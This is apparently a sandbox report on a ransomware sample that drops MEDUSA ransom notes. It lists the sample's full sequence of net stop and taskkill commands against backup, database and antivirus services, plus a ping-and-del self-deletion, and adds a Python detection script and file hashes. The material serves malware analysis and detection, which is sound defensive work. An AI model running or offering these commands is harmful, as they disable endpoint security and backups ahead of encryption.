net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net stop "EhttpSrv" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EhttpSrv" /y

C:\Windows\SysWOW64\net.exe

net stop "ekrn" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ekrn" /y

C:\Windows\SysWOW64\net.exe

net stop "ESHASRV" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ESHASRV" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "AVP" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AVP" /y

C:\Windows\SysWOW64\net.exe

net stop "klnagent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "klnagent" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "kavfsslp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "kavfsslp" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFSGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFSGT" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFS" /y

C:\Windows\SysWOW64\net.exe

net stop "mfefire" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfefire" /y

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM zoolz.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM agntsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbeng50.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbsnmp.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM encsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM excel.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefoxconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM infopath.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM isqlplussvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msaccess.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msftesql.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mspub.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopqos.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-nt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-opt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocautoupds.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocomm.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocssd.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM onenote.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM oracle.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM outlook.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM powerpnt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqbcoreservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlagent.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlbrowser.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlservr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlwriter.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM steam.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM synctime.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tbirdconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat64.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thunderbird.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM visio.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM winword.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM wordpad.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM xfssvccon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tmlisten.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM PccNTMon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM CNTAoSMgr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Ntrtscan.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1856 -ip 1856

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 364
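
Detection logic for the sequence the process list shows, as an added example that is not part of the sandbox report or of the sample: the parent (PID 1856) issues a burst of `net stop "<service>" /y` against backup, database and endpoint-security services, a burst of `taskkill /F /IM <image> /T` against office, database and mail clients, then `cmd /c ping localhost -n 3 > nul & del <own path>` to remove its own binary after a short delay. Two details in the listing matter when writing such a rule. Each `net stop` appears twice because `net.exe` hands the work to `net1.exe` with the same arguments, so counting both halves doubles the tally. And `net1.exe` is logged with an image path under `SysWOW64` while its command line says `system32`: the 32-bit sample asked for System32 and WOW64 file-system redirection served the 32-bit copy, so key rules on the logged image path, not on the path string inside the command line. The event schema (`pid`, `ppid`, `image`, `cmdline`), the burst thresholds and the PIDs of the taskkill and cmd events below are assumptions; the net/net1 PIDs and all command lines are taken from the report.

```python
"""Detection heuristics for the service-stop / process-kill / self-delete sequence in the
process list above.  Added example, not part of the sandbox report.  Events are constructed
to mirror the report; the field names (pid, ppid, image, cmdline) are an assumed schema."""
from __future__ import annotations
import shlex
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath

MALWARE = r"C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe"
NET, NET1 = r"C:\Windows\SysWOW64\net.exe", r"C:\Windows\SysWOW64\net1.exe"
TASKKILL, CMD = r"C:\Windows\SysWOW64\taskkill.exe", r"C:\Windows\SysWOW64\cmd.exe"

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str    # path of the executable that started, as logged by the sensor
    cmdline: str  # command line as logged

def tokenize(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, honouring double quotes and leaving
    backslashes alone (posix=False); the surrounding quotes are then dropped."""
    lexer = shlex.shlex(cmdline, posix=False)
    lexer.whitespace_split = True
    lexer.commenters = ""
    return [tok.strip('"') for tok in lexer]

def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()

def stopped_services(events) -> dict[int, set[str]]:
    """Parent PID -> service names it tried to stop with 'net stop <svc> /y'.  Only net.exe
    is counted: net1.exe is the helper net.exe spawns with the same arguments."""
    per_parent: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        toks = tokenize(ev.cmdline) if basename(ev.image) == "net.exe" else []
        if len(toks) >= 3 and toks[1].lower() == "stop" and "/y" in (t.lower() for t in toks):
            per_parent[ev.ppid].add(toks[2])
    return per_parent

def killed_images(events) -> dict[int, set[str]]:
    """Parent PID -> image names passed to 'taskkill /F /IM <image>'."""
    per_parent: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        toks = [t.lower() for t in tokenize(ev.cmdline)] if basename(ev.image) == "taskkill.exe" else []
        if "/f" in toks and "/im" in toks and toks.index("/im") + 1 < len(toks):
            per_parent[ev.ppid].add(toks[toks.index("/im") + 1])
    return per_parent

def self_delete_parents(events) -> set[int]:
    """PIDs whose child cmd.exe runs 'ping ... & del <parent's own image>': the
    delay-then-delete idiom that removes the binary once the parent has exited."""
    by_pid = {ev.pid: ev for ev in events}
    hits: set[int] = set()
    for ev in events:
        if basename(ev.image) != "cmd.exe":
            continue
        toks = tokenize(ev.cmdline)
        low = [t.lower() for t in toks]
        if "ping" in low and "del" in low and low.index("del") + 1 < len(toks):
            parent = by_pid.get(ev.ppid)
            # PureWindowsPath equality is case-insensitive, like the file system it models
            if parent and PureWindowsPath(toks[low.index("del") + 1]) == PureWindowsPath(parent.image):
                hits.add(ev.ppid)
    return hits

def wow64_redirected(ev: ProcEvent) -> bool:
    """True when the logged image is under SysWOW64 but the command line names System32:
    a 32-bit process asked for System32 and file-system redirection served the 32-bit copy."""
    toks = tokenize(ev.cmdline)
    return bool(toks) and "\\syswow64\\" in ev.image.lower() and toks[0].lower().startswith("c:\\windows\\system32\\")

def assess(events, service_threshold: int = 5, kill_threshold: int = 5) -> dict[int, list[str]]:
    """Parent PID -> findings, emitted only once one parent crosses the burst thresholds
    (the thresholds are assumptions; tune them against your own admin tooling)."""
    findings: dict[int, list[str]] = defaultdict(list)
    for ppid, svcs in stopped_services(events).items():
        if len(svcs) >= service_threshold:
            findings[ppid].append(f"net stop /y against {len(svcs)} services")
    for ppid, imgs in killed_images(events).items():
        if len(imgs) >= kill_threshold:
            findings[ppid].append(f"taskkill /F /IM against {len(imgs)} image names")
    for ppid in self_delete_parents(events):
        findings[ppid].append("self-delete via cmd /c ping ... & del <own image>")
    return dict(findings)

# Constructed events.  net.exe/net1.exe PIDs and every command line come from the report;
# the PIDs of the taskkill, cmd and benign admin events are invented for the example.
SAMPLE_EVENTS = [ProcEvent(1856, 4000, MALWARE, f'"{MALWARE}"')]
for net_pid, net1_pid, svc in [(5048, 5024, "Acronis VSS Provider"), (3996, 1944, "Enterprise Client Service"),
                               (1568, 2464, "Sophos Agent"), (3724, 3524, "Sophos AutoUpdate Service"),
                               (4092, 1532, "Sophos Clean Service")]:
    SAMPLE_EVENTS.append(ProcEvent(net_pid, 1856, NET, f'net stop "{svc}" /y'))
    SAMPLE_EVENTS.append(ProcEvent(net1_pid, net_pid, NET1, f'C:\\Windows\\system32\\net1 stop "{svc}" /y'))
for i, img in enumerate(["zoolz.exe", "agntsvc.exe", "dbeng50.exe", "excel.exe", "sqlservr.exe"]):
    SAMPLE_EVENTS.append(ProcEvent(6001 + i, 1856, TASKKILL, f"taskkill /F /IM {img} /T"))
SAMPLE_EVENTS.append(ProcEvent(6100, 1856, CMD, f"cmd /c ping localhost -n 3 > nul & del {MALWARE}"))
SAMPLE_EVENTS.append(ProcEvent(7001, 7000, NET, 'net stop "Spooler" /y'))  # lone admin stop, below threshold
```

Running `assess(SAMPLE_EVENTS)` returns findings for PID 1856 only: the single `net stop` from the benign parent stays below the threshold, the `net1.exe` children are ignored so the five services are counted once, and the self-delete is attributed to the parent whose image the `del` names. The same three functions work unchanged on a Sysmon Event ID 1 or EDR process-creation export once the four fields are mapped.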

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
NL 52.111.243.31:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

F:\!!!READ_ME_MEDUSA!!!.txt

MD5 ae2ccfb68aaf040e01ec2280b75c4d49
SHA1 6dd072344d5159e751451ba24624a1e2adbe6e07
SHA256 beff87729e2c44475014eb1efd72bb128b33a9b22309339c2332e3f718e8c4cd
SHA512 69dc9b2ff371a8f49b2d236e81bcaba33df55d5e96f262b16a2de170c88832fbd8696f00e39ef5ee0d8ee85e988abc2b80b3901a773d9161f0d9dc525f5f1618

C:\$Recycle.Bin\S-1-5-21-1194130065-3471212556-1656947724-1000\desktop.ini

MD5 461144deb78f186786c0083b1d631ba5
SHA1 6edf715f4572cc97d4fc2e6d85fe4a3000460695
SHA256 62966eca3d9068ba40aca83474c1fcbd253c024c9275f3c8842b3a1acc0c9735
SHA512 42a5b37cb99338fa00e7984b22773cc1d91f417eb7c50b7cac136b6cdda42f2faa5cd14642ada887cac18f2b02af9889d4f3356f4e104adce81aeafcd17aed77

C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.MEDUSA

MD5 3169afccd4668ba411f6251dfc00c4e5
SHA1 c780245a8869741d733a310fb4bd51812fdbfda1
SHA256 b910a6fe8a3a6dcf3325e6c08a1a1aad55caec1d2944339fd6b341171ac76fa1
SHA512 c1b3a4087e655032a5bae22e59c55d3d5aaf14f3fc3fd12f0d8757135e17680d048d652379545f33e41e23f5923dbfa5aa30183bd8f72ee6550b1076de3c6b50